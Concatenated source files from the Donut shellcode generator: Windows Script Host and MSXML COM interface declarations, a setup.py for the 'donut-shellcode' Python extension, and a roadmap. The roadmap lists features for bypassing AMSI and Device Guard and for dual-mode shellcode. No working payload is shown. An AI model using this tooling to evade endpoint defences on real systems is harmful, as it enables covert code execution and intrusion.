236 | static STDMETHODIMP Host_Quit(IHost *This, int ExitCode); | |
237 | ||
238 | // Returns the file name of the currently running script. | |
239 | static STDMETHODIMP Host_get_ScriptName(IHost *This, BSTR *out_ScriptName); | |
240 | ||
241 | // Returns the full path of the currently running script. | |
242 | static STDMETHODIMP Host_get_ScriptFullName(IHost *This, BSTR *out_ScriptFullName); | |
243 | ||
244 | // Returns the WshArguments object (a collection of arguments). | |
245 | static STDMETHODIMP Host_get_Arguments(IHost *This, void **out_Arguments); | |
246 | ||
247 | static STDMETHODIMP Host_get_Version(IHost *This, BSTR *out_Version); | |
248 | ||
249 | // Returns the Windows Script Host build version number. | |
250 | static STDMETHODIMP Host_get_BuildVersion(IHost *This, int *out_Build); | |
251 | ||
252 | static STDMETHODIMP Host_get_Timeout(IHost *This, LONG *out_Timeout); | |
253 | ||
254 | static STDMETHODIMP Host_put_Timeout(IHost *This, LONG v); | |
255 | ||
256 | // Connects the object's event sources to functions with a given prefix. | |
257 | static STDMETHODIMP Host_CreateObject(IHost *This, BSTR ProgID, BSTR Prefix, IDispatch **out_Dispatch); | |
258 | ||
259 | // Outputs text to either a message box or the command console window. | |
260 | static STDMETHODIMP Host_Echo(IHost *This, SAFEARRAY *args); | |
261 | ||
262 | // Retrieves an existing object with the specified ProgID, or creates a new one from a file. | |
263 | static STDMETHODIMP Host_GetObject(IHost *This, BSTR Pathname, BSTR ProgID, BSTR Prefix, IDispatch **out_Dispatch); | |
264 | ||
265 | // Disconnects a connected object's event sources. | |
266 | static STDMETHODIMP Host_DisconnectObject(IHost *This, IDispatch *Object); | |
267 | ||
268 | // Suspends script execution for a specified length of time, then continues execution. | |
269 | static STDMETHODIMP Host_Sleep(IHost *This, LONG Time); | |
270 | ||
271 | // Connects the object's event sources to functions with a given prefix. | |
272 | static STDMETHODIMP Host_ConnectObject(IHost *This, IDispatch *Object, BSTR Prefix); | |
273 | ||
274 | // Exposes the read-only input stream for the current script. | |
275 | static STDMETHODIMP Host_get_StdIn(IHost *This, void **ppts); | |
276 | ||
277 | // Exposes the write-only output stream for the current script. | |
278 | static STDMETHODIMP Host_get_StdOut(IHost *This, void **ppts); | |
279 | ||
280 | // Exposes the write-only error output stream for the current script. | |
281 | static STDMETHODIMP Host_get_StdErr(IHost *This, void **ppts); | |
282 | ||
283 | #endif |
0 | /** | |
1 | BSD 3-Clause License | |
2 | ||
3 | Copyright (c) 2019, TheWover, Odzhan. All rights reserved. | |
4 | ||
5 | Redistribution and use in source and binary forms, with or without | |
6 | modification, are permitted provided that the following conditions are met: | |
7 | ||
8 | * Redistributions of source code must retain the above copyright notice, this | |
9 | list of conditions and the following disclaimer. | |
10 | ||
11 | * Redistributions in binary form must reproduce the above copyright notice, | |
12 | this list of conditions and the following disclaimer in the documentation | |
13 | and/or other materials provided with the distribution. | |
14 | ||
15 | * Neither the name of the copyright holder nor the names of its | |
16 | contributors may be used to endorse or promote products derived from | |
17 | this software without specific prior written permission. | |
18 | ||
19 | THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" | |
20 | AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE | |
21 | IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE | |
22 | DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE | |
23 | FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL | |
24 | DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR | |
25 | SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER | |
26 | CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, | |
27 | OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE | |
28 | OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE. | |
29 | */ | |
30 | ||
31 | /** | |
32 | typedef struct IXMLDOMNodeVtbl { | |
33 | BEGIN_INTERFACE | |
34 | ||
35 | HRESULT ( STDMETHODCALLTYPE *QueryInterface )( | |
36 | IXMLDOMNode * This, | |
37 | REFIID riid, | |
38 | void **ppvObject); | |
39 | ||
40 | ULONG ( STDMETHODCALLTYPE *AddRef )( | |
41 | IXMLDOMNode * This); | |
42 | ||
43 | ULONG ( STDMETHODCALLTYPE *Release )( | |
44 | IXMLDOMNode * This); | |
45 | ||
46 | HRESULT ( STDMETHODCALLTYPE *GetTypeInfoCount )( | |
47 | IXMLDOMNode * This, | |
48 | UINT *pctinfo); | |
49 | ||
50 | HRESULT ( STDMETHODCALLTYPE *GetTypeInfo )( | |
51 | IXMLDOMNode * This, | |
52 | UINT iTInfo, | |
53 | LCID lcid, | |
54 | ITypeInfo **ppTInfo); | |
55 | ||
56 | HRESULT ( STDMETHODCALLTYPE *GetIDsOfNames )( | |
57 | IXMLDOMNode * This, | |
58 | REFIID riid, | |
59 | LPOLESTR *rgszNames, | |
60 | UINT cNames, | |
61 | LCID lcid, | |
62 | DISPID *rgDispId); | |
63 | ||
64 | HRESULT ( STDMETHODCALLTYPE *Invoke )( | |
65 | IXMLDOMNode * This, | |
66 | DISPID dispIdMember, | |
67 | REFIID riid, | |
68 | LCID lcid, | |
69 | WORD wFlags, | |
70 | DISPPARAMS *pDispParams, | |
71 | VARIANT *pVarResult, | |
72 | EXCEPINFO *pExcepInfo, | |
73 | UINT *puArgErr); | |
74 | ||
75 | HRESULT ( STDMETHODCALLTYPE *get_nodeName )( | |
76 | IXMLDOMNode * This, | |
77 | BSTR *name); | |
78 | ||
79 | HRESULT ( STDMETHODCALLTYPE *get_nodeValue )( | |
80 | IXMLDOMNode * This, | |
81 | VARIANT *value); | |
82 | ||
83 | HRESULT ( STDMETHODCALLTYPE *put_nodeValue )( | |
84 | IXMLDOMNode * This, | |
85 | VARIANT value); | |
86 | ||
87 | HRESULT ( STDMETHODCALLTYPE *get_nodeType )( | |
88 | IXMLDOMNode * This, | |
89 | DOMNodeType *type); | |
90 | ||
91 | HRESULT ( STDMETHODCALLTYPE *get_parentNode )( | |
92 | IXMLDOMNode * This, | |
93 | IXMLDOMNode **parent); | |
94 | ||
95 | HRESULT ( STDMETHODCALLTYPE *get_childNodes )( | |
96 | IXMLDOMNode * This, | |
97 | IXMLDOMNodeList **childList); | |
98 | ||
99 | HRESULT ( STDMETHODCALLTYPE *get_firstChild )( | |
100 | IXMLDOMNode * This, | |
101 | IXMLDOMNode **firstChild); | |
102 | ||
103 | HRESULT ( STDMETHODCALLTYPE *get_lastChild )( | |
104 | IXMLDOMNode * This, | |
105 | IXMLDOMNode **lastChild); | |
106 | ||
107 | HRESULT ( STDMETHODCALLTYPE *get_previousSibling )( | |
108 | IXMLDOMNode * This, | |
109 | IXMLDOMNode **previousSibling); | |
110 | ||
111 | HRESULT ( STDMETHODCALLTYPE *get_nextSibling )( | |
112 | IXMLDOMNode * This, | |
113 | IXMLDOMNode **nextSibling); | |
114 | ||
115 | HRESULT ( STDMETHODCALLTYPE *get_attributes )( | |
116 | IXMLDOMNode * This, | |
117 | IXMLDOMNamedNodeMap **attributeMap); | |
118 | ||
119 | HRESULT ( STDMETHODCALLTYPE *insertBefore )( | |
120 | IXMLDOMNode * This, | |
121 | IXMLDOMNode *newChild, | |
122 | VARIANT refChild, | |
123 | IXMLDOMNode **outNewChild); | |
124 | ||
125 | HRESULT ( STDMETHODCALLTYPE *replaceChild )( | |
126 | IXMLDOMNode * This, | |
127 | IXMLDOMNode *newChild, | |
128 | IXMLDOMNode *oldChild, | |
129 | IXMLDOMNode **outOldChild); | |
130 | ||
131 | HRESULT ( STDMETHODCALLTYPE *removeChild )( | |
132 | IXMLDOMNode * This, | |
133 | IXMLDOMNode *childNode, | |
134 | IXMLDOMNode **oldChild); | |
135 | ||
136 | HRESULT ( STDMETHODCALLTYPE *appendChild )( | |
137 | IXMLDOMNode * This, | |
138 | IXMLDOMNode *newChild, | |
139 | IXMLDOMNode **outNewChild); | |
140 | ||
141 | HRESULT ( STDMETHODCALLTYPE *hasChildNodes )( | |
142 | IXMLDOMNode * This, | |
143 | VARIANT_BOOL *hasChild); | |
144 | ||
145 | HRESULT ( STDMETHODCALLTYPE *get_ownerDocument )( | |
146 | IXMLDOMNode * This, | |
147 | IXMLDOMDocument **XMLDOMDocument); | |
148 | ||
149 | HRESULT ( STDMETHODCALLTYPE *cloneNode )( | |
150 | IXMLDOMNode * This, | |
151 | VARIANT_BOOL deep, | |
152 | IXMLDOMNode **cloneRoot); | |
153 | ||
154 | HRESULT ( STDMETHODCALLTYPE *get_nodeTypeString )( | |
155 | IXMLDOMNode * This, | |
156 | BSTR *nodeType); | |
157 | ||
158 | HRESULT ( STDMETHODCALLTYPE *get_text )( | |
159 | IXMLDOMNode * This, | |
160 | BSTR *text); | |
161 | ||
162 | HRESULT ( STDMETHODCALLTYPE *put_text )( | |
163 | IXMLDOMNode * This, | |
164 | BSTR text); | |
165 | ||
166 | HRESULT ( STDMETHODCALLTYPE *get_specified )( | |
167 | IXMLDOMNode * This, | |
168 | VARIANT_BOOL *isSpecified); | |
169 | ||
170 | HRESULT ( STDMETHODCALLTYPE *get_definition )( | |
171 | IXMLDOMNode * This, | |
172 | IXMLDOMNode **definitionNode); | |
173 | ||
174 | HRESULT ( STDMETHODCALLTYPE *get_nodeTypedValue )( | |
175 | IXMLDOMNode * This, | |
176 | VARIANT *typedValue); | |
177 | ||
178 | HRESULT ( STDMETHODCALLTYPE *put_nodeTypedValue )( | |
179 | IXMLDOMNode * This, | |
180 | VARIANT typedValue); | |
181 | ||
182 | HRESULT ( STDMETHODCALLTYPE *get_dataType )( | |
183 | IXMLDOMNode * This, | |
184 | VARIANT *dataTypeName); | |
185 | ||
186 | HRESULT ( STDMETHODCALLTYPE *put_dataType )( | |
187 | IXMLDOMNode * This, | |
188 | BSTR dataTypeName); | |
189 | ||
190 | HRESULT ( STDMETHODCALLTYPE *get_xml )( | |
191 | IXMLDOMNode * This, | |
192 | BSTR *xmlString); | |
193 | ||
194 | HRESULT ( STDMETHODCALLTYPE *transformNode )( | |
195 | IXMLDOMNode * This, | |
196 | IXMLDOMNode *stylesheet, | |
197 | BSTR *xmlString); | |
198 | ||
199 | HRESULT ( STDMETHODCALLTYPE *selectNodes )( | |
200 | IXMLDOMNode * This, | |
201 | BSTR queryString, | |
202 | IXMLDOMNodeList **resultList); | |
203 | ||
204 | HRESULT ( STDMETHODCALLTYPE *selectSingleNode )( | |
205 | IXMLDOMNode * This, | |
206 | BSTR queryString, | |
207 | IXMLDOMNode **resultNode); | |
208 | ||
209 | HRESULT ( STDMETHODCALLTYPE *get_parsed )( | |
210 | IXMLDOMNode * This, | |
211 | VARIANT_BOOL *isParsed); | |
212 | ||
213 | HRESULT ( STDMETHODCALLTYPE *get_namespaceURI )( | |
214 | IXMLDOMNode * This, | |
215 | BSTR *namespaceURI); | |
216 | ||
217 | HRESULT ( STDMETHODCALLTYPE *get_prefix )( | |
218 | IXMLDOMNode * This, | |
219 | BSTR *prefixString); | |
220 | ||
221 | HRESULT ( STDMETHODCALLTYPE *get_baseName )( | |
222 | IXMLDOMNode * This, | |
223 | BSTR *nameString); | |
224 | ||
225 | HRESULT ( STDMETHODCALLTYPE *transformNodeToObject )( | |
226 | IXMLDOMNode * This, | |
227 | IXMLDOMNode *stylesheet, | |
228 | VARIANT outputObject); | |
229 | ||
230 | END_INTERFACE | |
231 | } IXMLDOMNodeVtbl; | |
232 | ||
233 | typedef struct _IXMLDOMNode { | |
234 | IXMLDOMNodeVtbl *lpVtbl; | |
235 | } XMLDOMNode; | |
236 | ||
237 | typedef struct IXMLDOMDocumentVtbl { | |
238 | BEGIN_INTERFACE | |
239 | ||
240 | HRESULT ( STDMETHODCALLTYPE *QueryInterface )( | |
241 | IXMLDOMDocument * This, | |
242 | REFIID riid, | |
243 | ||
244 | __RPC__deref_out void **ppvObject); | |
245 | ||
246 | ULONG ( STDMETHODCALLTYPE *AddRef )( | |
247 | IXMLDOMDocument * This); | |
248 | ||
249 | ULONG ( STDMETHODCALLTYPE *Release )( | |
250 | IXMLDOMDocument * This); | |
251 | ||
252 | HRESULT ( STDMETHODCALLTYPE *GetTypeInfoCount )( | |
253 | IXMLDOMDocument * This, | |
254 | UINT *pctinfo); | |
255 | ||
256 | HRESULT ( STDMETHODCALLTYPE *GetTypeInfo )( | |
257 | IXMLDOMDocument * This, | |
258 | UINT iTInfo, | |
259 | LCID lcid, | |
260 | ITypeInfo **ppTInfo); | |
261 | ||
262 | HRESULT ( STDMETHODCALLTYPE *GetIDsOfNames )( | |
263 | IXMLDOMDocument * This, | |
264 | REFIID riid, | |
265 | LPOLESTR *rgszNames, | |
266 | UINT cNames, | |
267 | LCID lcid, | |
268 | DISPID *rgDispId); | |
269 | ||
270 | HRESULT ( STDMETHODCALLTYPE *Invoke )( | |
271 | IXMLDOMDocument * This, | |
272 | DISPID dispIdMember, | |
273 | REFIID riid, | |
274 | LCID lcid, | |
275 | WORD wFlags, | |
276 | DISPPARAMS *pDispParams, | |
277 | VARIANT *pVarResult, | |
278 | EXCEPINFO *pExcepInfo, | |
279 | UINT *puArgErr); | |
280 | ||
281 | HRESULT ( STDMETHODCALLTYPE *get_nodeName )( | |
282 | IXMLDOMDocument * This, | |
283 | BSTR *name); | |
284 | ||
285 | HRESULT ( STDMETHODCALLTYPE *get_nodeValue )( | |
286 | IXMLDOMDocument * This, | |
287 | VARIANT *value); | |
288 | ||
289 | HRESULT ( STDMETHODCALLTYPE *put_nodeValue )( | |
290 | IXMLDOMDocument * This, | |
291 | VARIANT value); | |
292 | ||
293 | HRESULT ( STDMETHODCALLTYPE *get_nodeType )( | |
294 | IXMLDOMDocument * This, | |
295 | DOMNodeType *type); | |
296 | ||
297 | HRESULT ( STDMETHODCALLTYPE *get_parentNode )( | |
298 | IXMLDOMDocument * This, | |
299 | IXMLDOMNode **parent); | |
300 | ||
301 | HRESULT ( STDMETHODCALLTYPE *get_childNodes )( | |
302 | IXMLDOMDocument * This, | |
303 | IXMLDOMNodeList **childList); | |
304 | ||
305 | HRESULT ( STDMETHODCALLTYPE *get_firstChild )( | |
306 | IXMLDOMDocument * This, | |
307 | IXMLDOMNode **firstChild); | |
308 | ||
309 | HRESULT ( STDMETHODCALLTYPE *get_lastChild )( | |
310 | IXMLDOMDocument * This, | |
311 | IXMLDOMNode **lastChild); | |
312 | ||
313 | HRESULT ( STDMETHODCALLTYPE *get_previousSibling )( | |
314 | IXMLDOMDocument * This, | |
315 | IXMLDOMNode **previousSibling); | |
316 | ||
317 | HRESULT ( STDMETHODCALLTYPE *get_nextSibling )( | |
318 | IXMLDOMDocument * This, | |
319 | IXMLDOMNode **nextSibling); | |
320 | ||
321 | HRESULT ( STDMETHODCALLTYPE *get_attributes )( | |
322 | IXMLDOMDocument * This, | |
323 | IXMLDOMNamedNodeMap **attributeMap); | |
324 | ||
325 | HRESULT ( STDMETHODCALLTYPE *insertBefore )( | |
326 | IXMLDOMDocument * This, | |
327 | IXMLDOMNode *newChild, | |
328 | VARIANT refChild, | |
329 | IXMLDOMNode **outNewChild); | |
330 | ||
331 | HRESULT ( STDMETHODCALLTYPE *replaceChild )( | |
332 | IXMLDOMDocument * This, | |
333 | IXMLDOMNode *newChild, | |
334 | IXMLDOMNode *oldChild, | |
335 | IXMLDOMNode **outOldChild); | |
336 | ||
337 | HRESULT ( STDMETHODCALLTYPE *removeChild )( | |
338 | IXMLDOMDocument * This, | |
339 | IXMLDOMNode *childNode, | |
340 | IXMLDOMNode **oldChild); | |
341 | ||
342 | HRESULT ( STDMETHODCALLTYPE *appendChild )( | |
343 | IXMLDOMDocument * This, | |
344 | IXMLDOMNode *newChild, | |
345 | IXMLDOMNode **outNewChild); | |
346 | ||
347 | HRESULT ( STDMETHODCALLTYPE *hasChildNodes )( | |
348 | IXMLDOMDocument * This, | |
349 | VARIANT_BOOL *hasChild); | |
350 | ||
351 | HRESULT ( STDMETHODCALLTYPE *get_ownerDocument )( | |
352 | IXMLDOMDocument * This, | |
353 | IXMLDOMDocument **XMLDOMDocument); | |
354 | ||
355 | HRESULT ( STDMETHODCALLTYPE *cloneNode )( | |
356 | IXMLDOMDocument * This, | |
357 | VARIANT_BOOL deep, | |
358 | IXMLDOMNode **cloneRoot); | |
359 | ||
360 | HRESULT ( STDMETHODCALLTYPE *get_nodeTypeString )( | |
361 | IXMLDOMDocument * This, | |
362 | BSTR *nodeType); | |
363 | ||
364 | HRESULT ( STDMETHODCALLTYPE *get_text )( | |
365 | IXMLDOMDocument * This, | |
366 | BSTR *text); | |
367 | ||
368 | HRESULT ( STDMETHODCALLTYPE *put_text )( | |
369 | IXMLDOMDocument * This, | |
370 | BSTR text); | |
371 | ||
372 | HRESULT ( STDMETHODCALLTYPE *get_specified )( | |
373 | IXMLDOMDocument * This, | |
374 | VARIANT_BOOL *isSpecified); | |
375 | ||
376 | HRESULT ( STDMETHODCALLTYPE *get_definition )( | |
377 | IXMLDOMDocument * This, | |
378 | IXMLDOMNode **definitionNode); | |
379 | ||
380 | HRESULT ( STDMETHODCALLTYPE *get_nodeTypedValue )( | |
381 | IXMLDOMDocument * This, | |
382 | VARIANT *typedValue); | |
383 | ||
384 | HRESULT ( STDMETHODCALLTYPE *put_nodeTypedValue )( | |
385 | IXMLDOMDocument * This, | |
386 | VARIANT typedValue); | |
387 | ||
388 | HRESULT ( STDMETHODCALLTYPE *get_dataType )( | |
389 | IXMLDOMDocument * This, | |
390 | VARIANT *dataTypeName); | |
391 | ||
392 | HRESULT ( STDMETHODCALLTYPE *put_dataType )( | |
393 | IXMLDOMDocument * This, | |
394 | BSTR dataTypeName); | |
395 | ||
396 | HRESULT ( STDMETHODCALLTYPE *get_xml )( | |
397 | IXMLDOMDocument * This, | |
398 | BSTR *xmlString); | |
399 | ||
400 | HRESULT ( STDMETHODCALLTYPE *transformNode )( | |
401 | IXMLDOMDocument * This, | |
402 | IXMLDOMNode *stylesheet, | |
403 | BSTR *xmlString); | |
404 | ||
405 | HRESULT ( STDMETHODCALLTYPE *selectNodes )( | |
406 | IXMLDOMDocument * This, | |
407 | BSTR queryString, | |
408 | IXMLDOMNodeList **resultList); | |
409 | ||
410 | HRESULT ( STDMETHODCALLTYPE *selectSingleNode )( | |
411 | IXMLDOMDocument * This, | |
412 | BSTR queryString, | |
413 | IXMLDOMNode **resultNode); | |
414 | ||
415 | HRESULT ( STDMETHODCALLTYPE *get_parsed )( | |
416 | IXMLDOMDocument * This, | |
417 | VARIANT_BOOL *isParsed); | |
418 | ||
419 | HRESULT ( STDMETHODCALLTYPE *get_namespaceURI )( | |
420 | IXMLDOMDocument * This, | |
421 | BSTR *namespaceURI); | |
422 | ||
423 | HRESULT ( STDMETHODCALLTYPE *get_prefix )( | |
424 | IXMLDOMDocument * This, | |
425 | BSTR *prefixString); | |
426 | ||
427 | HRESULT ( STDMETHODCALLTYPE *get_baseName )( | |
428 | IXMLDOMDocument * This, | |
429 | BSTR *nameString); | |
430 | ||
431 | HRESULT ( STDMETHODCALLTYPE *transformNodeToObject )( | |
432 | IXMLDOMDocument * This, | |
433 | IXMLDOMNode *stylesheet, | |
434 | VARIANT outputObject); | |
435 | ||
436 | HRESULT ( STDMETHODCALLTYPE *get_doctype )( | |
437 | IXMLDOMDocument * This, | |
438 | IXMLDOMDocumentType **documentType); | |
439 | ||
440 | HRESULT ( STDMETHODCALLTYPE *get_implementation )( | |
441 | IXMLDOMDocument * This, | |
442 | IXMLDOMImplementation **impl); | |
443 | ||
444 | HRESULT ( STDMETHODCALLTYPE *get_documentElement )( | |
445 | IXMLDOMDocument * This, | |
446 | IXMLDOMElement **DOMElement); | |
447 | ||
448 | HRESULT ( STDMETHODCALLTYPE *putref_documentElement )( | |
449 | IXMLDOMDocument * This, | |
450 | IXMLDOMElement *DOMElement); | |
451 | ||
452 | HRESULT ( STDMETHODCALLTYPE *createElement )( | |
453 | IXMLDOMDocument * This, | |
454 | BSTR tagName, | |
455 | IXMLDOMElement **element); | |
456 | ||
457 | HRESULT ( STDMETHODCALLTYPE *createDocumentFragment )( | |
458 | IXMLDOMDocument * This, | |
459 | IXMLDOMDocumentFragment **docFrag); | |
460 | ||
461 | HRESULT ( STDMETHODCALLTYPE *createTextNode )( | |
462 | IXMLDOMDocument * This, | |
463 | BSTR data, | |
464 | IXMLDOMText **text); | |
465 | ||
466 | HRESULT ( STDMETHODCALLTYPE *createComment )( | |
467 | IXMLDOMDocument * This, | |
468 | BSTR data, | |
469 | IXMLDOMComment **comment); | |
470 | ||
471 | HRESULT ( STDMETHODCALLTYPE *createCDATASection )( | |
472 | IXMLDOMDocument * This, | |
473 | BSTR data, | |
474 | IXMLDOMCDATASection **cdata); | |
475 | ||
476 | HRESULT ( STDMETHODCALLTYPE *createProcessingInstruction )( | |
477 | IXMLDOMDocument * This, | |
478 | BSTR target, | |
479 | BSTR data, | |
480 | IXMLDOMProcessingInstruction **pi); | |
481 | ||
482 | HRESULT ( STDMETHODCALLTYPE *createAttribute )( | |
483 | IXMLDOMDocument * This, | |
484 | BSTR name, | |
485 | IXMLDOMAttribute **attribute); | |
486 | ||
487 | HRESULT ( STDMETHODCALLTYPE *createEntityReference )( | |
488 | IXMLDOMDocument * This, | |
489 | BSTR name, | |
490 | IXMLDOMEntityReference **entityRef); | |
491 | ||
492 | HRESULT ( STDMETHODCALLTYPE *getElementsByTagName )( | |
493 | IXMLDOMDocument * This, | |
494 | BSTR tagName, | |
495 | IXMLDOMNodeList **resultList); | |
496 | ||
497 | HRESULT ( STDMETHODCALLTYPE *createNode )( | |
498 | IXMLDOMDocument * This, | |
499 | VARIANT Type, | |
500 | BSTR name, | |
501 | BSTR namespaceURI, | |
502 | IXMLDOMNode **node); | |
503 | ||
504 | HRESULT ( STDMETHODCALLTYPE *nodeFromID )( | |
505 | IXMLDOMDocument * This, | |
506 | BSTR idString, | |
507 | IXMLDOMNode **node); | |
508 | ||
509 | HRESULT ( STDMETHODCALLTYPE *load )( | |
510 | IXMLDOMDocument * This, | |
511 | VARIANT xmlSource, | |
512 | VARIANT_BOOL *isSuccessful); | |
513 | ||
514 | HRESULT ( STDMETHODCALLTYPE *get_readyState )( | |
515 | IXMLDOMDocument * This, | |
516 | long *value); | |
517 | ||
518 | HRESULT ( STDMETHODCALLTYPE *get_parseError )( | |
519 | IXMLDOMDocument * This, | |
520 | IXMLDOMParseError **errorObj); | |
521 | ||
522 | HRESULT ( STDMETHODCALLTYPE *get_url )( | |
523 | IXMLDOMDocument * This, | |
524 | BSTR *urlString); | |
525 | ||
526 | HRESULT ( STDMETHODCALLTYPE *get_async )( | |
527 | IXMLDOMDocument * This, | |
528 | VARIANT_BOOL *isAsync); | |
529 | ||
530 | HRESULT ( STDMETHODCALLTYPE *put_async )( | |
531 | IXMLDOMDocument * This, | |
532 | VARIANT_BOOL isAsync); | |
533 | ||
534 | HRESULT ( STDMETHODCALLTYPE *abort )( | |
535 | IXMLDOMDocument * This); | |
536 | ||
537 | HRESULT ( STDMETHODCALLTYPE *loadXML )( | |
538 | IXMLDOMDocument * This, | |
539 | BSTR bstrXML, | |
540 | VARIANT_BOOL *isSuccessful); | |
541 | ||
542 | HRESULT ( STDMETHODCALLTYPE *save )( | |
543 | IXMLDOMDocument * This, | |
544 | VARIANT destination); | |
545 | ||
546 | HRESULT ( STDMETHODCALLTYPE *get_validateOnParse )( | |
547 | IXMLDOMDocument * This, | |
548 | VARIANT_BOOL *isValidating); | |
549 | ||
550 | HRESULT ( STDMETHODCALLTYPE *put_validateOnParse )( | |
551 | IXMLDOMDocument * This, | |
552 | VARIANT_BOOL isValidating); | |
553 | ||
554 | HRESULT ( STDMETHODCALLTYPE *get_resolveExternals )( | |
555 | IXMLDOMDocument * This, | |
556 | VARIANT_BOOL *isResolving); | |
557 | ||
558 | HRESULT ( STDMETHODCALLTYPE *put_resolveExternals )( | |
559 | IXMLDOMDocument * This, | |
560 | VARIANT_BOOL isResolving); | |
561 | ||
562 | HRESULT ( STDMETHODCALLTYPE *get_preserveWhiteSpace )( | |
563 | IXMLDOMDocument * This, | |
564 | VARIANT_BOOL *isPreserving); | |
565 | ||
566 | HRESULT ( STDMETHODCALLTYPE *put_preserveWhiteSpace )( | |
567 | IXMLDOMDocument * This, | |
568 | VARIANT_BOOL isPreserving); | |
569 | ||
570 | HRESULT ( STDMETHODCALLTYPE *put_onreadystatechange )( | |
571 | IXMLDOMDocument * This, | |
572 | VARIANT readystatechangeSink); | |
573 | ||
574 | HRESULT ( STDMETHODCALLTYPE *put_ondataavailable )( | |
575 | IXMLDOMDocument * This, | |
576 | VARIANT ondataavailableSink); | |
577 | ||
578 | HRESULT ( STDMETHODCALLTYPE *put_ontransformnode )( | |
579 | IXMLDOMDocument * This, | |
580 | VARIANT ontransformnodeSink); | |
581 | ||
582 | END_INTERFACE | |
583 | } IXMLDOMDocumentVtbl; | |
584 | ||
585 | typedef struct _IXMLDOMDocument { | |
586 | IXMLDOMDocumentVtbl *lpVtbl; | |
587 | } XMLDomDocument;*/⏎ |
0 | from setuptools import Extension, setup | |
1 | ||
2 | with open("README.md", "r") as fh: | |
3 | long_description = fh.read() | |
4 | ||
5 | module = Extension( | |
6 | "donut", | |
7 | include_dirs=[ | |
8 | 'include' | |
9 | ], | |
10 | sources=[ | |
11 | 'donut.c', | |
12 | 'hash.c', | |
13 | 'encrypt.c', | |
14 | 'payload/clib.c', | |
15 | 'donutmodule.c' | |
16 | ] | |
17 | ) | |
18 | ||
19 | setup( | |
20 | name='donut-shellcode', | |
21 | version='0.9.2', | |
22 | description='Donut Python C extension', | |
23 | long_description=long_description, | |
24 | long_description_content_type="text/markdown", | |
25 | url='https://github.com/TheWover/donut', | |
26 | author='TheWover, Odzhan, byt3bl33d3r', | |
27 | include_package_data=True, | |
28 | zip_safe=True, | |
29 | ext_modules=[module], | |
30 | python_requires='>=3.0', | |
31 | ) |
0 | * v0.9.1: | |
1 | * Dual-Mode shellcode that can run in either x64 for x86 (WOW64) processes. | |
2 | * Automatic detection of the CLR version required for .NET Assembly payloads. | |
3 | * AMSI bypassing for version .NET 4.8 that ensure all Assemblies can be safely loaded. | |
4 | * Modular system for adding bypasses. Your choide of bypass functionality is compiled into payload.exe based on compiler flags. | |
5 | * Bypass for Device Guard policy preventing execution of dynamically generated .NET code | |
6 | * Better handling of Main functions (Entry Points) that use an object array containing string arrays, rather than an array of strings | |
7 | * v1.0: | |
8 | * C# generator | |
9 | * C# wrapper for our dynamic library | |
10 | * Python generator | |
11 | * Python wrapper for our dynamic library | |
12 | * Better documentation for debugging, designing with, and integrating Donut. | |
13 | * v1.1: | |
14 | * Automatic unloading of Application Domains after the Assembly finishes executing. | |
15 | * Support for HTTP proxies |